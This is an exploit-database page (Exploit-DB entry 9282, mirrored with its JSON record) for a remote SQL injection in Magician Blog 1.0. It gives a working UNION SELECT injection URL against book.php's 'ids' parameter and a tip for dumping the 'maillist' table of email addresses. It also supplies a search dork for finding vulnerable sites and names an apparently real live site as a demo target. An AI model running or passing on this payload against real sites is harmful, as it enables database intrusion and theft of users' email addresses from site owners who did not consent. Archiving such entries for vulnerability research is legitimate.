Search...

Magician Blog <= 1.0 ids Remote SQL Injection Vulnerability

2009-07-27T00:00:00

ID EDB-ID:9282
Type exploitdb
Reporter Evil-Cod3r
Modified 2009-07-27T00:00:00

Description

Magician Blog <= 1.0 (ids) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [Â»] ~ Note : Been Repoted The Programed
==============================================================================
        [Â»] Magician Blog &lt;= 1.0 Remot SQL injection Valunrability
==============================================================================

    [Â»] Script:             [ Magician v1.0 ]
    [Â»] Language:           [ PHP ]
    [Â»] home:               [ www.4smart.net ]
    [Â»] Founder:            [ Evil-Cod3r &lt;IE7@Windowslive.com - o41@hotmail.Com&gt; ]
    [Â»] Gr44tz to:          [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ]
    [Â»] Dork:               [ "Powered By 4smart" ]
    [Â»] Price:              [ $300 But i Scanned The Nulled !! ]

###########################################################################

===[ Exploit SQL  ]===  
  
    [Â»] http://www.Site.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
    [Â»] Note : if you want mail list this is a table [ maillist ] the column &gt; [email] and show mail list

  

===[ Live Demo ]===  

        [Â»] http://www.aloamman.com/
       

Author: Evil-Cod3r &lt;-

###########################################################################

# milw0rm.com [2009-07-27]

JSON Vulners Source

Initial Source

{"hash": "f2ba4c5f88db219c8950b18037d75339e97a78eef39af81816fb6e199866e3c4", "id": "EDB-ID:9282", "lastseen": "2016-02-01T10:15:36", "enchantments": {"vulnersScore": 10.0}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/9282/", "description": "Magician Blog <= 1.0 (ids) Remote SQL Injection Vulnerability. Webapps exploit for php platform", "title": "Magician Blog <= 1.0 ids Remote SQL Injection Vulnerability", "sourceData": "==============================================================================\n _ _ _ _ _ _\n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n\n==============================================================================\n [\u00c2\u00bb] ~ Note : Been Repoted The Programed\n==============================================================================\n [\u00c2\u00bb] Magician Blog <= 1.0 Remot SQL injection Valunrability\n==============================================================================\n\n [\u00c2\u00bb] Script: [ Magician v1.0 ]\n [\u00c2\u00bb] Language: [ PHP ]\n [\u00c2\u00bb] home: [ www.4smart.net ]\n [\u00c2\u00bb] Founder: [ Evil-Cod3r <IE7@Windowslive.com - o41@hotmail.Com> ]\n [\u00c2\u00bb] Gr44tz to: [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ]\n [\u00c2\u00bb] Dork: [ \"Powered By 4smart\" ]\n [\u00c2\u00bb] Price: [ $300 But i Scanned The Nulled !! ]\n\n###########################################################################\n\n===[ Exploit SQL ]=== \n \n [\u00c2\u00bb] http://www.Site.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--\n [\u00c2\u00bb] Note : if you want mail list this is a table [ maillist ] the column > [email] and show mail list\n\n \n\n===[ Live Demo ]=== \n\n [\u00c2\u00bb] http://www.aloamman.com/\n \n\nAuthor: Evil-Cod3r <-\n\n###########################################################################\n\n# milw0rm.com [2009-07-27]\n", "objectVersion": "1.0", "cvelist": [], "published": "2009-07-27T00:00:00", "osvdbidlist": [], "references": [], "reporter": "Evil-Cod3r", "modified": "2009-07-27T00:00:00", "href": "https://www.exploit-db.com/exploits/9282/"}

Magician Blog &lt;= 1.0 ids Remote SQL Injection Vulnerability

Description

Magician Blog <= 1.0 (ids) Remote SQL Injection Vulnerability. Webapps exploit for php platform

Magician Blog <= 1.0 ids Remote SQL Injection Vulnerability